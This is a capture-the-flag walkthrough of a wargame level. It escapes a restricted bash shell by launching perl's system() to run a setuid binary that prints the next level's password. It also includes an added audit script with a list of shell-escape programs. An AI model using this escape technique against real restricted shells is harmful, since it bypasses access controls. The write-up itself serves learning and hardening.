Welcome back. Today we’re going to be looking at level3 of the Blowfish wargame from Smash The Stack. Since this is level3, I’ll assume you have the password from completing level2. Also, as always, the password will be stripped from this page and replaced with Y’s. Now, let’s ssh in and get started.
Upon logging in we see a banner message,
You are in a restricted shell. If you can break out of it, you need to find the backdoor hidden somewhere in the system. find it and cat /pass/level4
Ok, sounds like level 3 so far. Let’s check what we can find, and perhaps what this restricted shell is.
level3@blowfish:~$ find / -user level4 -group level3 2>/dev/null
-rbash: /dev/null: restricted: cannot redirect output
level3@blowfish:~$ find / -user level4 -group level3
-rbash: find: command not found
level3@blowfish:~$ pwd
/home/level3
level3@blowfish:~$ ls
-rbash: ls: command not found
level3@blowfish:~$ /usr/ls
-rbash: /usr/ls: restricted: cannot specify `/' in command names
Interesting. find and ls aren't available (they're not on whatever PATH this shell has), and rbash won't let us work around that with a full path, because command names containing a slash are refused outright. Let's scope out this restricted shell a bit more. We could google and read up on rbash, but let's also experiment.
level3@blowfish:~$ pwd
/home/level3
level3@blowfish:~$ echo $PATH
/home/rbash
Now we really need to find out what is in /home/rbash, since that directory is the entire set of commands we can run. Let's open another PuTTY window and connect to blowfish again, but this time as level2. From there we can look around. First we want to find the backdoor the banner mentioned; second, we want to know what is in /home/rbash:
level2@blowfish:~$ find / -user level4 -group level3 2>/dev/null
/home/level3/.. /cat_lvl4
level2@blowfish:~$ ls -la "/home/level3/.. /cat_lvl4"
-r-sr-x--- 1 level4 level3 7460 2007-12-03 13:41 /home/level3/.. /cat_lvl4
level2@blowfish:~$ ls -la /home/rbash
total 8
drwxr-xr-x 2 711 root 4096 2009-08-15 22:11 .
drwxr-xr-x 22 l3thal root 4096 2009-08-09 23:35 ..
lrwxrwxrwx 1 711 root 8 2009-08-15 22:11 cat -> /bin/cat
lrwxrwxrwx 1 711 root 13 2009-08-09 23:13 perl -> /usr/bin/perl
Alright, we found the SUID program we're going to execute. The name is odd, and the directory it lives in is named with dots and spaces, so we wrap the path in quotes. Note the permissions: it is setuid level4, group level3, mode r-sr-x---, so level2 can see the file but not run it; only level3 (through the group) can, which is why we need to escape level3's own shell rather than simply running the binary from our level2 session. We also checked /home/rbash and found two symlinks, one to /bin/cat and one to /usr/bin/perl. Those two are the whole toolbox rbash gives us, and one of them is enough: rbash restricts the shell, not the programs it launches, and perl's system() hands a command string like ours to a normal, unrestricted /bin/sh, which has no objection to a path with slashes in it. So if we write a perl script that calls cat_lvl4, we should be in business. Let's jump on our level2 shell and do some programming. (Remember to keep it in /tmp and to clean up afterwards!)
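The contents of /home/rbash decide this level: rbash is only as strong as the weakest program it lets you run. The script below is an added example (not from the original write-up and not part of the wargame) that audits an rbash PATH directory and flags the entries a restricted user could use to break out. The ESCAPE_BINS list is my own assumption, a short, non-exhaustive set of commonly known shell-escape programs, and the demo directory rebuilds the two symlinks seen above in a temp directory as constructed sample data.

```shell
#!/bin/sh
# Added example, not part of the original write-up: audit the directory an
# rbash PATH points at and flag entries that can spawn a subprocess, since
# any such program lets a user escape the restricted shell (as perl does
# in this level). ESCAPE_BINS is an assumption: a short, non-exhaustive
# list of commonly known shell-escape programs.

ESCAPE_BINS="sh bash dash zsh perl python python2 python3 ruby lua php tclsh awk gawk vi vim ed less more man find env xargs nice"

# Print one line per entry in the PATH directory: NAME TARGET VERDICT
# (VERDICT is "escape" if the program is on the list, otherwise "ok").
audit_rbash_path() {
    dir=$1
    for entry in "$dir"/*; do
        # skip the literal pattern when the directory is empty
        [ -e "$entry" ] || [ -L "$entry" ] || continue
        name=$(basename "$entry")
        # rbash dirs are usually full of symlinks; resolve one level so
        # "cat -> /bin/cat" is judged by what it actually points at
        if [ -L "$entry" ]; then
            target=$(readlink "$entry")
        else
            target=$entry
        fi
        verdict=ok
        for bad in $ESCAPE_BINS; do
            if [ "$(basename "$target")" = "$bad" ] || [ "$name" = "$bad" ]; then
                verdict=escape
                break
            fi
        done
        printf '%s %s %s\n' "$name" "$target" "$verdict"
    done
}

# Print only the names a restricted user could use to break out.
rbash_escape_candidates() {
    audit_rbash_path "$1" | while read -r name target verdict; do
        if [ "$verdict" = escape ]; then
            printf '%s\n' "$name"
        fi
    done
}

# Build a throwaway directory with the same two links the level3 PATH
# (/home/rbash) had: cat -> /bin/cat and perl -> /usr/bin/perl.
# Constructed test data; the link targets need not exist locally.
make_demo_rbash_dir() {
    d=$(mktemp -d)
    ln -s /bin/cat "$d/cat"
    ln -s /usr/bin/perl "$d/perl"
    printf '%s\n' "$d"
}

# Stand-alone run: audit the demo layout, list escapes, then clean up.
demo=$(make_demo_rbash_dir)
audit_rbash_path "$demo"
rbash_escape_candidates "$demo"
rm -rf "$demo"
```

Against the layout from this box the audit reports cat as ok and perl as an escape. On a real system you would point it at the directory PATH names, e.g. `audit_rbash_path /home/rbash`, and treat any "escape" line as a hole in the restricted shell: rbash limits what the shell itself will do, not what a whitelisted interpreter or editor does once it is running.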
First let’s create a perl program, let’s call it test.pl. In it we will simply call the program we want to execute. The whole script is as follows:
level2@blowfish:/tmp/.somedir$ cat test.pl
#!/usr/bin/perl
system('/home/level3/..\ \ \ \ \ /cat_lvl4');
level2@blowfish:/tmp/.somedir$ chmod 777 test.pl
level2@blowfish:/tmp/.somedir$ ls -la test.pl
-rwxrwxrwx 1 level2 level2 62 2012-07-20 09:05 test.pl
Permissions matter here: the script will run as level3, so level3 must be able to read it (we pass it to perl as an argument, so the execute bit isn't actually needed) and must be able to traverse /tmp/.somedir. chmod 777 gets us there, but it is more than required, and it leaves the script world-writable, so anyone else on the box could edit it before we run it as level3; a world-readable file (chmod 644) in a world-searchable directory would have done. Now let's switch back over to our level3 shell and run the script.
level3@blowfish:~$ perl /tmp/.somedir/test.pl
YYYYYYYYYYY
Bam. The cat_lvl4 program already runs cat /pass/level4 for us. There we have it: the password for level4 and the end of level3. So, while a restricted shell like rbash can make things more awkward, it doesn't make them impossible. It restricts what the shell itself will do (no slashes in command names, no redirection), not what a program on the whitelisted PATH will do once launched, so any interpreter or editor that can spawn a subprocess is a way out. We used the level2 login to look around and to write the script, but that was a convenience rather than a requirement: perl was already on level3's PATH, and rbash only objects to slashes in command names, not in arguments. The lesson generalizes: wherever a restricted environment leaves a script interpreter within reach, or a script ends up calling a SUID program, that is where to look. The successful attack is often the one delivered through an unexpected vector.